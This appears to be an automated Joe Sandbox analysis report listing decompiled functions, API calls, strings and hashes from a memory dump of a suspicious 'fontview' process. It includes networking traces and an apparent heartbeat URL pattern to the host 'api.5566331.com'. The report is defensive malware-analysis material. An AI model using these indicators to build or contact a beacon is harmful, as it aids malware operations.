Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeHeap_free_memmovefreeaddrinfogetaddrinfohtons
String ID:
API String ID: 189201043-0
Opcode ID: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
Instruction ID: 8b64a374cbdad8b26f637beff122fe858c6ba4784a9924af0ca1a5756791f1ba
Opcode Fuzzy Hash: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
Instruction Fuzzy Hash: F141BF32A047119FC314CF54D885A6BF7F5EFC8251F80861EF84A8A261EB71D944CB82

Function 10027260 Relevance: 10.6, APIs: 7, Instructions: 64windowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(75922F30,?,?,?,?,?,?,?,?,?,?,10023517,B7A91B76), ref: 1002726C
timeGetTime.WINMM(?,000004FF,00000004,?,?,?,?,?,?,?,?,?,?,10023517,B7A91B76), ref: 1002728C
MsgWaitForMultipleObjectsEx.USER32(00000001,?,?,000004FF,00000004), ref: 100272BA
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100272D0
TranslateMessage.USER32(?), ref: 100272E4
DispatchMessageA.USER32(?), ref: 100272EA
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 100272F8

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Message$PeekTimetime$DispatchMultipleObjectsTranslateWait
String ID:
API String ID: 443098685-0
Opcode ID: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
Instruction ID: 079f8dbcd54a8d9c3218eb8dc4e85431248a595f9298e6c6c7ee3261443cfdea
Opcode Fuzzy Hash: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
Instruction Fuzzy Hash: 81118F71A40219ABEB10DBA4DD86FDDB7B8EB08750F204165FA05E72D0E7B1EE448B61

Function 1001136C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

CoCreateGuid.OLE32(?), ref: 1001138D
_fprintf.LIBCMT ref: 100113A5
__snprintf.LIBCMT ref: 100113F3

Strings

%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 100113EB
create guid error, xrefs: 10011397
guid: %s, xrefs: 100113FC

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CreateGuid__snprintf_fprintf
String ID: %08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$create guid error$guid: %s
API String ID: 2959897907-549114592
Opcode ID: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
Instruction ID: 34a024b1c78299da0623422e875facfe61a2b6fae81b3d97e7196060f838763d
Opcode Fuzzy Hash: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
Instruction Fuzzy Hash: 89118CA6C041997EDB51D7E58C12EFFBBFC9B09602F044042FA94E9082E638E745DB70

Function 1002F4D0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 447sleepthreadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033BD
Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033F4

Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,00000000,00000005,?,?), ref: 1002FA74
PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002FAC5
InternetCloseHandle.WININET(00000000), ref: 1002FADD

Strings

http:, xrefs: 1002F67E, 1002F7A0
https:, xrefs: 1002F646, 1002F7E9

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _memmove$CloseHandleInternetMessagePostSleepThread
String ID: http:$https:
API String ID: 1130311992-2714316481
Opcode ID: e92d616c37334f230bc487a600fe1986539f6064d4e22bcb91fdb7cfa4225be8
Instruction ID: 915af8a31af0a75dffe03e89711a24d46bdad9159a96e45aa538bd49b24774f9
Opcode Fuzzy Hash: e92d616c37334f230bc487a600fe1986539f6064d4e22bcb91fdb7cfa4225be8
Instruction Fuzzy Hash: 5C127E70508381DFE321CF24D884BABBBE1FF89384F54896DE599872A1DB71A845CB53

Function 10024220 Relevance: 9.1, APIs: 6, Instructions: 128memorynetworkCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 1002427A
_memmove.LIBCMT ref: 100242C5
WSASend.WS2_32(?,00000018,00000001,?,00000000,00000000,00000000), ref: 100242F6
WSAGetLastError.WS2_32 ref: 10024301
InterlockedDecrement.KERNEL32(00000028), ref: 10024318
HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 10024340

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Heap$AllocDecrementErrorFreeInterlockedLastSend_memmove
String ID:
API String ID: 1113664776-0
Opcode ID: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
Instruction ID: 47d4c8ab42c6eea9bfe2ced7c1d785e30afba0d0751f843b89e14ba74dfb26aa
Opcode Fuzzy Hash: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
Instruction Fuzzy Hash: F1418E71A0060AEFDB00CFA5D880A9AB7F9FF48314F41462AE915E7640DB70FE54CB90

Function 100221C0 Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 100251A0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100251C5
Part of subcall function 100251A0: SwitchToThread.KERNEL32(?,?,?,?,?,1002240E), ref: 100251E9
Part of subcall function 100251A0: Sleep.KERNEL32(00000001,?,?,?,?,?,1002240E), ref: 100251FB

SetLastError.KERNEL32(000010DD), ref: 100222CC

Part of subcall function 10022490: socket.WS2_32(?,00000001,00000006), ref: 100224D7
Part of subcall function 10022490: ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
Part of subcall function 10022490: bind.WS2_32(?,00000002,0000001C), ref: 10022540
Part of subcall function 10022490: SetLastError.KERNEL32(00000000), ref: 10022551
Part of subcall function 10022490: listen.WS2_32(?,?), ref: 1002256F

CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?), ref: 10022255
GetLastError.KERNEL32 ref: 10022262
SetLastError.KERNEL32(00000000), ref: 1002226C
GetLastError.KERNEL32(?,?), ref: 100222AD
SetLastError.KERNEL32(00000000), ref: 100222B8

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLast$CompareCompletionCreateExchangeInterlockedPortSleepSwitchThreadbindioctlsocketlistensocket
String ID:
API String ID: 3008254831-0
Opcode ID: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
Instruction ID: 25731126ecceef237b5eadcf649c6642afb87f46824a2e3290a2af4592c0b696
Opcode Fuzzy Hash: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
Instruction Fuzzy Hash: DC31AD31604646FFE700DFA5D848BAABBE9FF84750F50422AE811C77C0DB76A814CB90

Function 1001F300 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10026BA0: GetCurrentThreadId.KERNEL32 ref: 10026BA4

CloseHandle.KERNEL32(?,B7A91B76), ref: 1001F34F
CloseHandle.KERNEL32(?,B7A91B76), ref: 1001F35C
DeleteCriticalSection.KERNEL32(?,B7A91B76), ref: 1001F374
_free.LIBCMT ref: 1001F393
HeapDestroy.KERNEL32(?), ref: 1001F3C1
_free.LIBCMT ref: 1001F3F0

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandle_free$CriticalCurrentDeleteDestroyHeapSectionThread
String ID:
API String ID: 4172272558-0
Opcode ID: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
Instruction ID: 109e83372a2a65c369b5238d9d2ce49368707bcd3d3f496a78113b41b42a28fc
Opcode Fuzzy Hash: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
Instruction Fuzzy Hash: E0318BB0600745DBDB10CF69C844B9BFBE8FF54304F00461DE4559B690DBB5E948CB90

Function 1001544F Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10015454
__time64.LIBCMT ref: 1001547B

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 10015488
_rand.LIBCMT ref: 100154A7
_rand.LIBCMT ref: 100154BC
_rand.LIBCMT ref: 100154C9

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _rand$Time$FileH_prologSystem__aulldiv__time64
String ID:
API String ID: 719677733-0
Opcode ID: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
Instruction ID: a88c9a8f57be324bb81784dc804cb620c9220be911630338d4b2a3c06f03dd55
Opcode Fuzzy Hash: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
Instruction Fuzzy Hash: 00114C7ED10520ABC311DBA48C41BDEB3A5EF85666F65451BF825EF141CA79BCC052A0

Function 1001519A Relevance: 9.0, APIs: 6, Instructions: 34synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,1000EF35,000001C8), ref: 100151AF
GetLastError.KERNEL32 ref: 100151BB
ReleaseMutex.KERNEL32(00000000), ref: 100151C9
CloseHandle.KERNEL32(00000000), ref: 100151D0
ReleaseMutex.KERNEL32(00000000), ref: 100151DA
CloseHandle.KERNEL32(00000000), ref: 100151E1

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID:
API String ID: 299056699-0
Opcode ID: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
Instruction ID: 800ce60f158ef0ea3815663d752b036469cae43976e0dcf2657369177bbbfcb0
Opcode Fuzzy Hash: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
Instruction Fuzzy Hash: 06F0FE76401A29FFE7029FB5DC999DE3BACEB15242B048012F9068A111C731DA85CFA5

Function 1002F0F0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 283sleepthreadwindowCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,?,?,?), ref: 1002F457
PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002F496
InternetCloseHandle.WININET(00000010), ref: 1002F4A5

Strings

http:, xrefs: 1002F19E, 1002F24B
https:, xrefs: 1002F166, 1002F287

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandleInternetMessagePostSleepThread
String ID: http:$https:
API String ID: 3505073871-2714316481
Opcode ID: dc6705592221c2859f8811f9389cf8a6e0681e09b3c681b12275105aae90a8da
Instruction ID: 08bc87893911aea4971000add18b57d5099268f2de168e91a491ab19bf3e696c
Opcode Fuzzy Hash: dc6705592221c2859f8811f9389cf8a6e0681e09b3c681b12275105aae90a8da
Instruction Fuzzy Hash: D1B1AE705083808FE711DF68E884B2BBBE6EF85394F84493DF496872A1D7B1D949CB52

Function 100114D7 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 195COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100114DC
__time64.LIBCMT ref: 100114FD

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 10012234: __EH_prolog.LIBCMT ref: 10012239
Part of subcall function 10012234: _free.LIBCMT ref: 100122FF
Part of subcall function 10012234: _free.LIBCMT ref: 10012311

Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8

Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950

Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704

Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E

_sprintf.LIBCMT ref: 100116C9

Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473

Strings

/index.php/inface/Heart/index?data=%s&member_id=%s&time=%d, xrefs: 100116C3
api.5566331.com, xrefs: 100116F0

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog$Time_free_memmove_sprintf$FileSystem__aulldiv__time64
String ID: /index.php/inface/Heart/index?data=%s&member_id=%s&time=%d$api.5566331.com
API String ID: 2351994653-2092688287
Opcode ID: 95f3a4b827d29c6a5c07f07f173c87bea5ef40cab863c3ac0567fab4c1ba7807
Instruction ID: 883e9699974774e929dbfcc03b4e97d480afeffec36dd8d9086cd3d6d81822b8
Opcode Fuzzy Hash: 95f3a4b827d29c6a5c07f07f173c87bea5ef40cab863c3ac0567fab4c1ba7807
Instruction Fuzzy Hash: EF816F75D00158EEDB25DBA4CC91BEDB7B8EF14340F5081AAE40A63146EF706B89CFA1

Function 10027310 Relevance: 7.8, APIs: 5, Instructions: 328windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100273D1
GetCurrentThreadId.KERNEL32 ref: 1002756D
CreateThread.KERNEL32(00000000,00000000,1002F0F0,?,00000000,00000000), ref: 10027597
Sleep.KERNEL32(0000000A,?,?,?,?,B7A91B76,?,00000000,?), ref: 100275AE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100275BE

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: MessageThread$CreateCurrentSleep_memmove
String ID:
API String ID: 3715655313-0
Opcode ID: 39d5c62766e2bbc70ef6cdbd50fa4a5060fd233e8bf87d7b70c1b337f9c92bb8
Instruction ID: 20035363636fbff4d5577a0cf27411d17544e9d07305abe0b436cc653ffae869
Opcode Fuzzy Hash: 39d5c62766e2bbc70ef6cdbd50fa4a5060fd233e8bf87d7b70c1b337f9c92bb8
Instruction Fuzzy Hash: 69C1AC31A002559FDB01DFA8CC55BAEBFB1FB05310FD44269E80A6B6D2CBB5AD41CB91

Function 1004A373 Relevance: 7.8, APIs: 5, Instructions: 259COMMON

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

__invoke_watson.LIBCMT ref: 1004A58B

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd_noexit__invoke_watson
String ID:
API String ID: 175857852-0
Opcode ID: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
Instruction ID: 1d3f45d9d31e3010abf2b66f438840b9e2b7bc4b933bb305e85ec94c22506c0b
Opcode Fuzzy Hash: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
Instruction Fuzzy Hash: 1971F5765006129EEB15DB24CC86B6B77ECEF82351F2480B9FD05DA086FB74EE848764

Function 10024410 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 1002446C
EnterCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024482
LeaveCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024491

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID:
API String ID: 3376869089-0
Opcode ID: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
Instruction ID: e1103fb16bcf34c27b6bba3f82fa35d23c377cf532448162990da8c687367291
Opcode Fuzzy Hash: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
Instruction Fuzzy Hash: 1531CF72A04B65EFD701CF84E885B99F7F8FB04725F91422AF90993680CB75AD50CBA0

Function 10034365 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 10034371

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_free.LIBCMT ref: 10034384

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
